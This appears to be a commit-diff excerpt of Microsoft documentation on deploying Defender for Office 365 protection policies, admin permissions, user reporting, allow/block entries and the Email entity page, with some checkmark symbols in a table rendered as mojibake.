- As new protection capabilities are added to EOP and Defender for Office 365 and as the security landscape changes, the settings in preset security policies are automatically updated to our recommended settings.
--- **Custom policies**: For most available protection policies, you can create any number of custom policies. You can apply the policies to users using recipient conditions and exceptions (users, group members, or domains) and you can customize the settings.-
-The previous information and the protection policies that are involved are summarized in the following table:
-
-|&nbsp;|Default policies|Preset security policies|Custom policies|
-||::|::|::|
-|**EOP protection policies**:||||
-|&nbsp;&nbsp;[Anti-malware](anti-malware-policies-configure.md)|Γ£ö|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;[Anti-spam](anti-spam-policies-configure.md)|Γ£ö|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;[Anti-phishing (spoofing protection)](anti-phishing-policies-about.md#spoof-settings)|Γ£ö|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;[Outbound spam](outbound-spam-policies-configure.md)|Γ£ö||Γ£ö|
-|&nbsp;&nbsp;[Connection filtering](connection-filter-policies-configure.md)|Γ£ö┬╣|||
-|**Defender for Office 365 policies**:||||
-|&nbsp;&nbsp;[Anti-phishing (spoofing protection)](anti-phishing-policies-about.md#spoof-settings) plus: <ul><li>[Impersonation protection](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)</li><li>[Advanced phishing thresholds](anti-phishing-policies-about.md#advanced-phishing-thresholds-in-anti-phishing-policies-in-microsoft-defender-for-office-365)</li></ul>|Γ£ö┬▓|Γ£ö┬▓|Γ£ö|
-|&nbsp;&nbsp;[Safe Links](safe-links-policies-configure.md)|┬│|Γ£ö|Γ£ö|
-|&nbsp;&nbsp;[Safe Attachments](safe-attachments-policies-configure.md)|┬│|Γ£ö|Γ£ö|
-|**General behavior**||||
-|&nbsp;&nbsp;Protection on by default?|✔|⁴||
-|&nbsp;&nbsp;Configure conditions/exceptions for protection?||✔⁵|✔|
-|&nbsp;&nbsp;Customize security settings?|✔|⁶|✔|
-|&nbsp;&nbsp;Protection settings automatically updated?||Γ£ö||
-
-┬╣ There are no default entries in the IP Allow List or the IP Block List, so the default connection filter policy effectively does nothing unless you customize the settings.
-
-┬▓ There are no entries or optional exceptions for user impersonation or domain impersonation protection in Defender for Office 365 until you configure them.
-
-┬│ Although there are no default Safe Attachments or Safe Links policies in Defender for Office 365, Built-in protection provides basic Safe Attachments and Safe Links protection that's always on.
-
-⁴ Built-in protection (Safe Attachments and Safe Links protection in Defender for Office 365) is the only preset security policy that's on by default.
-
-⁵ For the Standard and Strict preset security policies, you can configure separate recipient conditions and optional exceptions for EOP and Defender for Office 365 protection. For Built-in protection in Defender for Office 365, you can only configure recipient exceptions from protection.
-
-⁶ The only customizable security settings in preset security policies are the entries and optional exceptions for user impersonation protection and domain impersonation protection in the Standard and Strict preset security policies in Defender for Office 365.
-
-### Order of precedence for protection policies
-
-How protection policies are applied is an important consideration as you decide how to configure security settings for users. The important points to remember are:
--- Protection features have an unconfigurable [order of processing](how-policies-and-protections-are-combined.md). For example, incoming messages are always evaluated for malware before spam.-- The protection policies of a specific feature (anti-spam, anti-malware, anti-phishing, etc.) are applied in a specific order of precedence (more on the order of precedence later).-- If a user is intentionally or unintentionally included in multiple policies of a specific feature, the first protection policy for that feature where the user is defined (based on the order of precedence) determines what happens to the item (a message, file, URL, etc.).-- Once that first protection policy is applied to a specific item for a user, policy processing for that feature stops. No more protection policies of that feature are evaluated for that user and that specific item.-
-The order of precedence is explained in detail at [Order of precedence for preset security policies and other policies](preset-security-policies.md#order-of-precedence-for-preset-security-policies-and-other-policies), but is briefly summarized here:
-
-1. Protection policies in preset security policies:
- 1. The Strict preset security policy.
- 2. The Standard preset security policy.
-2. Custom protection policies of a specific feature (for example, anti-malware policies). Each custom policy has a priority value that determines the order that the policy is applied in relation to other protection policies of the same feature:
- 1. A custom policy with the priority value 0.
- 2. A custom policy with the priority value 1.
- 3. And so on.
-3. The default protection policy of a specific feature (for example, anti-malware) or Built-in protection in Defender for Office 365 (Safe Links and Safe Attachments).
-
-Refer to the previous table to see how a specific protection policy is represented in the precedence order. For example, anti-malware policies are present at each level. Outbound spam policies are available at the custom policy and default policy levels. The connection filter policy is available only at the default policy level.
-
-To avoid confusion and unintended application of policies, use the following guidelines:
--- Use unambiguous groups or lists of recipients at each level. For example, use different groups or lists of recipients for the Standard and Strict preset security policies.-- Configure exceptions at each level as required. For example, configure recipients who need custom policies as exceptions to the Standard and Strict preset security policies.-- Any remaining recipients that aren't identified at the higher levels get the default policies or Built-in protection in Defender for Office 365 (Safe Links and Safe Attachments).-
-Armed with this information, you can decide the best way to implement protection policies in the organization.
-
-### Determine your protection policy strategy
-
-Now that you know about the different types of protection policies and how they're applied, you can decide how you want to use EOP and Defender for Office 365 to protect the users in your organization. Your decision inevitably falls somewhere within the following spectrum:
--- Use the Standard preset security policy only.-- Use the Standard and Strict preset security policies.-- Use preset security policies and custom policies.-- Use custom policies only.-
-Remember, default policies (and Built-in protection in Defender for Office 365) automatically protect all recipients in the organization (anyone who isn't defined in the Standard or Strict preset security policy or in custom policies). So even if you do nothing, all recipients in the organization get the default protections as described in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).
-
-It's also important to realize that you aren't locked into your initial decision forever. The information in the [recommended settings tables](recommended-settings-for-eop-and-office365.md) and the [comparison table for Standard and Strict](preset-security-policies.md#policy-settings-in-preset-security-policies) should allow you to make an informed decision. But if needs, results, or circumstances change, it's not difficult to switch to a different strategy later.
-
-**Without a compelling business need that indicates otherwise, we recommend starting with the Standard preset security policy for all users in your organization**. Preset security policies are configured with settings based on years of observations in the Microsoft 365 datacenters, and should be the right choice for the majority of organizations. And, the policies are automatically updated to match the threats of the security landscape.
-
-In preset security policies, you can select the **All recipients** option to easily apply protection to all recipients in the organization.
-
-If you want to include some users in the Strict preset security policy and the remaining users in the Standard preset security policy, remember to account for the [order of precedence](#order-of-precedence-for-protection-policies) as described earlier in this article with the following methods:
--- Use unambiguous groups or lists of recipients in each preset security policy.-
- or
--- Configure recipients who should get the settings of the Standard preset security policy as exceptions in the Strict preset security policy.-
-Keep in mind that the following protection feature configurations are unaffected by preset security policies (you can use preset security policies and also independently configure these protection settings):
--- [Outbound spam policies (custom and default)](outbound-spam-policies-configure.md)-- [The default connection filter policy (IP Allow List and IP Block List)](connection-filter-policies-configure.md)-- [Globally turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-configure.md)-- [Globally turn on and configure Safe Documents](safe-documents-in-e5-plus-security-about.md) (available and meaningful only with licenses that aren't included in Defender for Office 365 (for example, Microsoft 365 A5 or Microsoft 365 E5 Security))-
-To turn on and configure preset security policies, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).
-
-The decision to use custom policies instead of or in addition to preset security policies ultimately comes down to the following business requirements:
--- Users require security settings that are _different_ from the unmodifiable settings in preset security policies (junk vs. quarantine or vice-versa, no safety tips, notify custom recipients, etc.).-- Users require settings that _aren't configured_ in preset security policies (for example, blocking email from specific countries or in specific languages in anti-spam policies).-- Users need a _quarantine experience_ that's different from the unmodifiable settings in preset security policies. [Quarantine policies](quarantine-policies.md#appendix) define what users can do to their quarantined messages based on why the message was quarantined, and whether recipients are notified about their quarantined messages. The default end-user quarantine experience is summarized in the table [here](quarantine-end-user.md) and the quarantine policies that are used in the Standard and Strict preset security policies are described in the tables [here](recommended-settings-for-eop-and-office365.md).-
-Use the information in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md) to compare the available settings in custom policies or default policies versus what's configured in the Standard and Strict preset security policies.
-
-Design guidelines for multiple custom policies for a specific feature (for example, anti-malware policies) include:
--- Users in custom policies can't be included in the Standard or Strict preset security policies due to the [order of precedence](#order-of-precedence-for-protection-policies).-- Assign fewer users to higher priority policies and more users to lower priority policies.-- Configure higher priority policies to have stricter or more specialized settings than lower priority policies (including the default policies).-
-If you decide to use custom policies, use the [Configuration analyzer](configuration-analyzer-for-security-policies.md) to periodically compare the settings in your policies to the recommended settings in the Standard and Strict preset security policies.
-
-## Step 3: Assign permissions to admins
-
-**Summary**: Assign the [Security Administrator](/entra/identity/role-based-access-control/permissions-reference#security-administrator) role in Azure Active Directory to other admins, specialists, and help desk personnel so they can do tasks in EOP and Defender for Office 365.
-
-**Details**:
-
-You're probably already using the initial account that you used to enroll in Microsoft 365 to do all the work in this deployment guide. That account is an admin everywhere in Microsoft 365 (specifically, it's a member of the [Global Administrator](/entra/identity/role-based-access-control/permissions-reference#global-administrator) role in Azure Active Directory (Azure AD)), and allows you to do pretty much anything. The required permissions were described earlier in this article at [Roles and permissions](#roles-and-permissions).
-
-But, the intent of this step is to configure other admins to help you manage the features of EOP and Defender for Office 365 in the future. What you don't want is a lot of people with Global Administrator power who don't need it. For example, do they really need to delete/create accounts or make other users Global Administrators? The concept of _least privilege_ (assigning only the required permissions to do the job and nothing more) is a good practice to follow.
-
-When it comes to assigning permissions for tasks in EOP and Defender for Office 365, the following options are available:
--- [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): These permissions apply to all workloads in Microsoft 365 (Exchange Online, SharePoint Online, Microsoft Teams, etc.).-- [Exchange Online permissions](/exchange/permissions-exo/permissions-exo): Most tasks in EOP and Defender for Office 365 are available using Exchange Online permissions. Assigning permissions only in Exchange Online prevents administrative access in other Microsoft 365 workloads.-- [Email & collaboration permissions in the Microsoft Defender portal](scc-permissions.md): Administration of some security features in EOP and Defender for Office 365 is available with Email & collaboration permissions. For example:
- - [Configuration analyzer](configuration-analyzer-for-security-policies.md)
- - [Admin quarantine management](quarantine-admin-manage-messages-files.md) and [quarantine policies](quarantine-policies.md)
- - [Admin submissions and review of user reported messages](submissions-admin-review-user-reported-messages.md)
- - [User tags](user-tags-about.md)
-
-**For simplicity, we recommend using the [Security Administrator](/entra/identity/role-based-access-control/permissions-reference#security-administrator) role in Azure AD for others who need to configure settings in EOP and Defender for Office 365.**
-
-For instructions, see [Assign Microsoft Entra roles to users](/entra/identity/role-based-access-control/manage-roles-portal) and [Manage access to Microsoft Defender XDR with Azure Active Directory global roles](/microsoft-365/security/defender/m365d-permissions).
-
-## Step 4: Priority accounts and user tags
-
-**Summary**: Identify and tag the appropriate users in your organization as [priority accounts](/microsoft-365/admin/setup/priority-accounts) for easier identification in reports and investigations, and to receive [priority account protection](priority-accounts-turn-on-priority-account-protection.md) in Defender for Office 365. Consider creating and applying custom [user tags](user-tags-about.md) in Defender for Office 365 Plan 2.
-
-**Details**:
-
-In Defender for Office 365, priority accounts allows you to tag up to 250 high value users for ease of identification in reports and investigations. These priority account also receive additional heuristics that don't benefit regular employees. For more information, see [Manage and monitor priority accounts](/microsoft-365/admin/setup/priority-accounts) and [Configure and review priority account protection in Microsoft Defender for Office 365](priority-accounts-turn-on-priority-account-protection.md).
-
-In Defender for Office 365 Plan 2, you also have access to create and apply custom _user tags_ to easily identify specific groups of users in reports and investigations. For more information, see [User tags in Microsoft Defender for Office 365](user-tags-about.md).
-
-**Identify appropriate users to tag as priority accounts, and decide if you need to create and apply custom user tags.**
-
-## Step 5: Review and configure user reported message settings
-
-**Summary**: Deploy the [Report Message or Report Phishing add-ins](submissions-users-report-message-add-in-configure.md) or a [supported third party tool](submissions-user-reported-messages-custom-mailbox.md#message-submission-format-for-third-party-reporting-tools) so users can report false positives and false negatives in Outlook, and so those reported messages are available to admins on the **User-reported** tab of the **Submissions** page in the Defender portal. Configure the organization so reported messages go to a specified reporting mailbox, to Microsoft, or both.
-
-**Details**:
-
-The ability of users to report good messages marked as bad (false positives) or bad messages allowed (false negatives) is important for you to monitor and adjust protection settings in EOP and Defender for Office 365.
-
-The important parts of user message reporting are:
--- **How do users report messages?**: Make sure clients are using one of the following methods so reported messages appear on the **User-reported** tab of the **Submissions** page in the Defender portal at <https://security.microsoft.com/reportsubmission?viewid=user>:--- The built-in **Report** button in Outlook on the web (formerly known as Outlook Web App or OWA).-- The Microsoft [Report Message or Report Phishing add-ins](submissions-users-report-message-add-in-configure.md) for Outlook and Outlook on the web.-- Third-party reporting tools that use the [supported message submission format](submissions-user-reported-messages-custom-mailbox.md#message-submission-format-for-third-party-reporting-tools).--- **Where do user reported messages go?**: You have the following options:
- - To a designated reporting mailbox and to Microsoft (this is the default value).
- - To a designated reporting mailbox only.
- - To Microsoft only.
-
- The default mailbox that's used to collect user reported messages is the Global Administrator's mailbox (the initial account in the organization). If you want user reported messages to go to a reporting mailbox in your organization, you should [create](/exchange/recipients-in-exchange-online/create-user-mailboxes) and [configure](submissions-user-reported-messages-custom-mailbox.md#configuration-requirements-for-the-reporting-mailbox) an exclusive mailbox to use.
-
- It's up to you whether you want user reported messages to also go to Microsoft for analysis (exclusively or along with delivery to your designated reporting mailbox).
-
- If you want user reported messages to go only to your designated reporting mailbox, admins should [manually submit user reported messages to Microsoft for analysis](submissions-admin.md#submit-user-reported-messages-to-microsoft-for-analysis) from the **User-reported** tab of the **Submissions** page in the Defender portal at <https://security.microsoft.com/reportsubmission?viewid=user>.
-
- Submitting user reported messages to Microsoft is important to allow our filters to learn and improve.
-
-For complete information about user reported message settings, see [User reported settings](submissions-user-reported-messages-custom-mailbox.md).
-
-## Step 6: Block and allow entries
-
-**Summary**: Familiarize yourself with the procedures to block and allow messages, files and URLs in Defender for Office 365.
-
-**Details**:
-
-You need to become familiar with how to block and (temporarily) allow message senders, files, and URLs at the following locations in the Defender portal:
--- The [Tenant Allow/Block List](tenant-allow-block-list-about.md) at <https://security.microsoft.com/tenantAllowBlockList>.-- The **Submissions** page at <https://security.microsoft.com/reportsubmission>.-- The **Spoof intelligence insight** page at <https://security.microsoft.com/spoofintelligence>.-
-In general, it's easier to create blocks than allows, because unnecessary allow entries expose your organization to malicious email that would have been filtered by the system.
--- **Block**:-
- - You can create block entries for **domains and email addresses**, **files**, and **URLs** on the corresponding tabs in the Tenant Allow/Block List and by submitting the items to Microsoft for analysis from the **Submissions** page. When you submit an item to Microsoft, corresponding block entries are also created in the Tenant Allow/Block List.
-
- > [!TIP]
- > Users in the organization also can't _send_ email to domains or email addresses that are specified in block entries in the Tenant Allow/Block List.
-
- - Messages blocked by [spoof intelligence](anti-spoofing-spoof-intelligence.md) are shown on the **Spoof intelligence** page. If you change an allow entry to a block entry, the sender becomes a manual block entry on the **Spoofed senders** tab in the Tenant Allow/Block List. You can also proactively create block entries for not yet encountered spoofed senders on the **Spoofed senders** tab.
--- **Allow**:-
- - You can't create allow entries for **domains and email addresses**, **files**, and **URLs** directly on the corresponding tabs in the Tenant Allow/Block List. Instead, you use the **Submissions** page to report the item to Microsoft. As you report the item to Microsoft, you can select to allow the item, which creates a corresponding temporary allow entry in the Tenant Allow/Block list.
-
- - Messages allowed by [spoof intelligence](anti-spoofing-spoof-intelligence.md) are shown on the **Spoof intelligence** page. If you change a block entry to an allow entry, the sender becomes a manual allow entry on the **Spoofed senders** tab in the Tenant Allow/Block List. You can also proactively create allow entries for not yet encountered spoofed senders on the **Spoofed senders** tab.
-
-For complete details, see the following articles:
--- [Allow or block email using the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md)-- [Allow or block files using the Tenant Allow/Block List](tenant-allow-block-list-files-configure.md)-- [Allow or block URLs using the Tenant Allow/Block List](tenant-allow-block-list-urls-configure.md)-- [Use the Submissions page to submit suspected spam, phish, URLs, legitimate email getting blocked, and email attachments to Microsoft](submissions-admin.md)-- [Override the spoof intelligence verdict](anti-spoofing-spoof-intelligence.md#override-the-spoof-intelligence-verdict)-
-## Step 7: Launch phishing simulations using Attack simulation training
-
-In Defender for Office 365 Plan 2, Attack simulation training allows you to send simulated phishing messages to users and assign training based on how they respond. The following options are available:
--- [Individual simulations](attack-simulation-training-simulations.md) using built-in or custom payloads.-- [Simulation automations](attack-simulation-training-simulation-automations.md) taken from real-world phishing attacks using multiple payloads and automated scheduling.-- [Training-only campaigns](attack-simulation-training-training-campaigns.md) where you don't need to launch a campaign and wait for users to click links or download attachments in the simulated phishing messages before trainings are assigned.-
-For more information, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-## Step 8: Investigate and respond
-
-Now that your initial set up is complete, use the information in the [Microsoft Defender for Office 365 Security Operations Guide](mdo-sec-ops-guide.md) to monitor and investigate threats in the organization.
security Mdo Email Entity Page https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/mdo-email-entity-page.md
- Title: The Email entity page in Defender for Office 365-- NOCSH--- Previously updated : 4/12/2024----- m365-security-- tier1-- highpri-
-description: Admins can learn about the Email entity page in Microsoft Defender for Office 365. This page shows many details about email messages. For example, email headers, threat detection details, the latest and original delivery locations, delivery actions, and IDs (for example, the Network message ID and the associated Alert ID).
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
--
-# The Email entity page in Microsoft Defender for Office 365
--
-Microsoft 365 organizations that have [Microsoft Defender for Office 365](mdo-about.md) included in their subscription or purchased as an add-on have the _Email entity page_. The Email entity page in the Microsoft Defender portal contains highly detailed information about an email message and any related entities.
-
-This article explains the information and actions on the Email entity page.
-
-## Permissions and licensing for the Email entity page
-
-To use the Email entity page, you need to be assigned permissions. The permissions and licensing are the same as Threat Explorer (Explorer) and Real-time detections. For more information, see [Permissions and licensing for Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md#permissions-and-licensing-for-threat-explorer-and-real-time-detections).
-
-## Where to find the Email entity page
-
-There are no direct links to the **Email entity** page from the top levels of the Defender portal. Instead, the :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Open email entity** action is available at the top of the email details flyout in many Defender for Office 365 features. This email details flyout is known as _the Email summary panel_, and contains a summarized subset of the information on the Email entity page. The email summary panel is identical across Defender for Office 365 features. For more information, see the [The Email summary panel](#the-email-summary-panel) section later in this article.
-
-The Email summary panel with the :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **Open email entity** action is available in the following locations:
--- From the **Advanced hunting** page at <https://security.microsoft.com/v2/advanced-hunting>: In the **Results** tab of an email-related query, click on the **NetworkMessageId** value of an entry in the table.--- *From the **Alerts** page at <https://security.microsoft.com/alerts>: For alerts with the **Detection source** value **MDO** or the **Product names** value **Microsoft Defender for Office 365**, select the entry by clicking on the **Alert name** value. In the alert details page that opens, select the message from the **Messages list** section.--- From the **Threat protection status** report at <https://security.microsoft.com/reports/TPSEmailPhishReportATP>:
- - Select **View data by Email \> Phish** and any of the available **Chart breakdown** selections. In the details table below the chart, select the entry by clicking anywhere in the row other than the check box next to the first column.
- - Select **View data by Email \> Malware** and any of the available **Chart breakdown** selections. In the details table below the chart, select the entry by clicking anywhere in the row other than the check box next to the first column.
- - Select **View data by Email \> Spam** and any of the available **Chart breakdown** selections. In the details table below the chart, select the entry by clicking anywhere in the row other than the check box next to the first column.
--- From the **Explorer** page at <https://security.microsoft.com/threatexplorerv3> (Threat Explorer) or from the **Real-time detections** page at <https://security.microsoft.com/realtimereportsv3>. Use one of the following methods:
- - In Threat Explorer, verify the **All email** view is selected \> verify the **Email** tab (view) in the details area is selected \> click on the **Subject** value in an entry.
- - In Threat Explorer or Real-time detections, select the **Malware** view \> verify the **Email** tab (view) in the details area is selected \> click on the **Subject** value in an entry.
- - In Threat Explorer or Real-time detections, select the **Phish** view \> verify the **Email** tab (view) in the details area is selected \> click on the **Subject** value in an entry.
--- From the **Incidents** page at <https://security.microsoft.com/incidents>: For incidents with the **Product names** value **Microsoft Defender for Office 365**, select the incident by clicking on the **Incident name** value. In the incident details page that opens, select the **Evidence and responses** tab (view). In the **All evidence** tab and the **Entity type** value **Email** or the **Emails** tab, select the entry by clicking anywhere in the row other than the check box.--- From the **Quarantine** page at <https://security.microsoft.com/quarantine>: Verify the **Email** tab is selected \> select an entry by clicking anywhere in the row other than the check box.--- From the **Submissions** page at <https://security.microsoft.com/reportsubmission>:
- - Select the **Emails** tab \> select an entry by clicking anywhere in the row other than the check box.
- - Select the **User reported** tab \> select an entry by clicking anywhere in the row other than the check box.
-
-## What's on the Email entity page
--
-The details pane on the left side of the page contains collapsible sections with details about the message. These sections remain constant as long as you're on the page. The available sections are:
--- **Tags** section. Shows any user tags (including Priority account) that are assigned to senders or recipients. For more information about user tags, see [User tags in Microsoft Defender for Office 365](user-tags-about.md).-- **Detection details** section:
- - **Original Threats**
- - **Original delivery location**:
- - **Deleted Items folder**
- - **Dropped**
- - **Delivered failed**
- - **Inbox folder**
- - **Junk Email folder**
- - **External**
- - **Quarantine**
- - **Unknown**
- - **Latest Threats**
- - **Latest delivery location**: The location of the message after system actions on the message (for example, [ZAP](zero-hour-auto-purge.md)), or admin actions on the message (for example, [Move to Deleted Items](threat-explorer-threat-hunting.md#email-remediation)). User actions on the message (for example, deleting or archiving the message) aren't shown, so this value doesn't guarantee the _current location_ of the message.
-
- > [!TIP]
- > There are scenarios where **Original delivery location**/**Latest delivery location** and/or **Delivery action** have the value **Unknown**. For example:
- >
- > - The message was delivered (**Delivery action** is **Delivered**), but an Inbox rule moved the message to a default folder other than the Inbox or Junk Email folder (for example, the Draft or Archive folder).
- > - ZAP attempted to move the message after delivery, but the message wasn't found (for example, the user moved or deleted the message).
-
- - **Detection technology**:
- - **Advanced filter**: Phishing signals based on machine learning.
- - **Campaign**: Messages identified as part of a [campaign](campaigns.md).
- - **File detonation**: [Safe Attachments](safe-attachments-about.md) detected a malicious attachment during detonation analysis.
- - **File detonation reputation**: File attachments previously detected by [Safe Attachments](safe-attachments-about.md) detonations in other Microsoft 365 organizations.
- - **File reputation**: The message contains a file that was previously identified as malicious in other Microsoft 365 organizations.
- - **Fingerprint matching**: The message closely resembles a previous detected malicious message.
- - **General filter**: Phishing signals based on analyst rules.
- - **Impersonation brand**: Sender impersonation of well-known brands.
- - **Impersonation domain**: Impersonation of sender domains that you own or specified for protection in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
- - **Impersonation user**: Impersonation of protected senders that you specified in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365) or learned through mailbox intelligence.
- - **Mailbox intelligence impersonation**: Impersonation detections from mailbox intelligence in [anti-phishing policies](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
- - **Mixed analysis detection**: Multiple filters contributed to the message verdict.
- - **Spoof DMARC**: The message failed [DMARC authentication](email-authentication-dmarc-configure.md).
- - **Spoof external domain**: Sender email address spoofing using a domain that's external to your organization.
- - **Spoof intra-org**: Sender email address spoofing using a domain that's internal to your organization.
- - **URL detonation**: [Safe Links](safe-links-about.md) detected a malicious URL in the message during detonation analysis.
- - **URL detonation reputation**: URLs previously detected by [Safe Links](safe-links-about.md) detonations in other Microsoft 365 organizations.
- - **URL malicious reputation**: The message contains a URL that was previously identified as malicious in other Microsoft 365 organizations.
- - **Delivery action**:
- - **Delivered**
- - **Junked**
- - **Blocked**
- - **Primary Override : Source**
- - Values for **Primary override**:
- - **Allowed by organization policy**
- - **Allowed by user policy**
- - **Blocked by organization policy**
- - **Blocked by user policy**
- - **None**
- - Values for **Primary override source**:
- - **3rd Party Filter**
- - **Admin initiated time travel** (ZAP)
- - **Antimalware policy block by file type**
- - **Antispam policy settings**
- - **Connection policy**
- - **Exchange transport rule**
- - **Exclusive mode (User override)**
- - **Filtering skipped due to on-prem organization**
- - **IP region filter from policy**
- - **Language filter from policy**
- - **Phishing Simulation**
- - **Quarantine release**
- - **SecOps Mailbox**
- - **Sender address list (Admin Override)**
- - **Sender address list (User override)**
- - **Sender domain list (Admin Override)**
- - **Sender domain list (User override)**
- - **Tenant Allow/Block List file block**
- - **Tenant Allow/Block List sender email address block**
- - **Tenant Allow/Block List spoof block**
- - **Tenant Allow/Block List URL block**
- - **Trusted contact list (User override)**
- - **Trusted domain (User override)**
- - **Trusted recipient (User override)**
- - **Trusted senders only (User override)**
-- **Email details** section:
- - **Directionality**:
- - **Inbound**
- - **Intra-irg**
- - **Outbound**
- - **Recipient (To)**<sup>\*</sup>
- - **Sender**<sup>\*</sup>
- - **Time received**
- - **Internet Message ID**<sup>\*</sup>: Available in the **Message-ID** header field in the message header. An example value is `<08f1e0f6806a47b4ac103961109ae6ef@server.domain>` (note the angle brackets).
- - **Network Message ID**<sup>\*</sup>: A GUID value that's available in the **X-MS-Exchange-Organization-Network-Message-Id** header field in the message header.
- - **Cluster ID**
- - **Language**
-
- <sup>\*</sup> The :::image type="icon" source="../../media/m365-cc-sc-copy-icon.png" border="false"::: **Copy to clipboard** action is available to copy the value.
-
-The tabs (views) along the top of the page allow you to investigate email efficiently. These views are described in the following subsections.
-
-### Timeline view
-
-The **Timeline** view shows the delivery and post-delivery events that happened to the message.
-
-The following message event information is available in the view. Select a column header to sort by that column. To add or remove columns, select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**. By default, all available columns are selected.
--- **Timeline** (date/time of the event)-- **Source**: For example: **System**, **Admin, or **User**.-- **Event types**-- **Result**-- **Threats**-- **Details**-
-If nothing happened to the message after delivery, the message is likely to have only one row in the **Timeline** view with the **Event types** value **Original delivery**. For example:
--- The **Result** value is **Inbox folder - Delivered**.-- The **Result** value is **Junk email folder - Delivered to Junk**-- The **Result** value is **Quarantine - Blocked**.-
-Subsequent actions to the message by users, admins, or Microsoft 365 add more rows to the view. For example:
--- The **Event types** value is **ZAP** and the **Result** value is **Message moved to Quarantine by ZAP**.-- The **Event types** value is **Quarantine Release** and the **Result** value is **Message was successfully released from Quarantine**.-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find information on the page. Type text in the box and then press the ENTER key.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the data in the view to a CSV file. The default filename is **- Microsoft Defender.csv** and the default location is the **Downloads** folder. If a file with that name already exists, the filename is appended with a number (for example, **- Microsoft Defender(1).csv**).
--
-### Analysis view
-
-The **Analysis** view contains information that helps you analyze the message in depth. The following information is available in this view:
--- **Threat detection details** section: Information about threats detected in the message:
- - **Threats**: The primary threat is indicated by :::image type="icon" source="../../media/m365-cc-sc-primary-threat-icon.png" border="false"::: **Primary threat**.
- - **Confidence level**: Values are **High**, **Medium**, or **Low**.
- - **Priority account protection**: Values are **Yes** or **No**. For more information, see [Configure and review priority account protection in Microsoft Defender for Office 365](priority-accounts-turn-on-priority-account-protection.md).
-- **Email detection details** section: Information about protection features or overrides that affected the message:
- - **All Overrides**: All organization or user settings that had the possibility to alter the intended delivery location of the message. For example, if the message matched a mail flow rule and a block entry in the [Tenant Allow/Block List](tenant-allow-block-list-about.md), both settings are listed here. The **Primary Override : Source** property value identifies the setting that actually affected the delivery of the message.
- - **Primary Override : Source**: Shows the organization or user setting that altered the intended delivery location of the message (allowed instead of blocked, or blocked instead of allowed). For example:
- - The message was blocked by a mail flow rule.
- - The message was allowed due to an entry in the user's [Safe Senders list](configure-junk-email-settings-on-exo-mailboxes.md).
- - **Exchange transport rules** (mail flow rules): If the message was affected by mail flow rules, the rule names and GUID vales are shown. Actions taken on messages by mail flow rules occur before spam and phishing verdicts.
-
- The :::image type="icon" source="../../media/m365-cc-sc-copy-icon.png" border="false"::: **Copy to clipboard** action is available to copy the rule GUID. For more information about mail flow rules, see [Mail flow rules (transport rules) in Exchange Online](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules).
-
- The **Go to Exchange admin center** link opens the **Rules** page in the new Exchange admin center at <https://admin.exchange.microsoft.com/#/transportrules>.
-
- - **Connector**: If the message was delivered through an Inbound connector, the connector name is shown. For more information about connectors, see [Configure mail flow using connectors in Exchange Online](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/use-connectors-to-configure-mail-flow).
- - **Bulk complaint level (BCL)**: A higher BCL value indicates the message is more likely to be spam. For more information, see [Bulk complaint level (BCL) in EOP](anti-spam-bulk-complaint-level-bcl-about.md).
- - **Policy**: If a policy type is listed here (for example, **Spam**), select **Configure** :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: to open the related policy page (for example, the **Anti-spam policies** page at <https://security.microsoft.com/antispam>).
- - **Policy action**
- - **Alert ID**: Select the Alert ID value to open the details page for the alert (as if you found and selected the alert from the **Alerts** page at <https://security.microsoft.com/alerts>). The :::image type="icon" source="../../media/m365-cc-sc-copy-icon.png" border="false"::: **Copy to clipboard** action is also available to copy the Alert ID value.
- - **Policy type**
- - **Client type**: Shows the type of client that sent the message (for example, REST)
- - **Email size**
- - **Data loss prevention rules**
-- **Sender-Recipient details** section: Details about the message sender and some recipient information:
- - **Sender display name**
- - **Sender address**<sup>\*</sup>
- - **Sender IP**
- - **Sender domain name**<sup>\*</sup>
- - **Domain creation date**: A recently created domain and other message signals can identify the message as suspicious.
- - **Domain owner**
- - **Sender MAIL FROM address**<sup>\*</sup>
- - **Sender MAIL FROM domain name**<sup>\*</sup>
- - **Return-Path**
- - **Return-Path domain**
- - **Location**
- - **Recipient domain**<sup>\*</sup>
- - **To**: Shows the first 5,000 characters of any email addresses in the To field of the message.
- - **Cc**: Shows the first 5,000 characters of any email addresses in the Cc field of the message.
- - **Distribution list**: Shows the distribution group (distribution list) if the recipient received the email as a member of the list. The top level distribution group is shown for nested distribution groups.
- - **Forwarding**: Indicates whether the message was [automatically forwarded to an external email address](outbound-spam-policies-external-email-forwarding.md). The forwarding user and the forwarding type are shown (mail flow rules, Inbox rules, or SMTP forwarding).
-
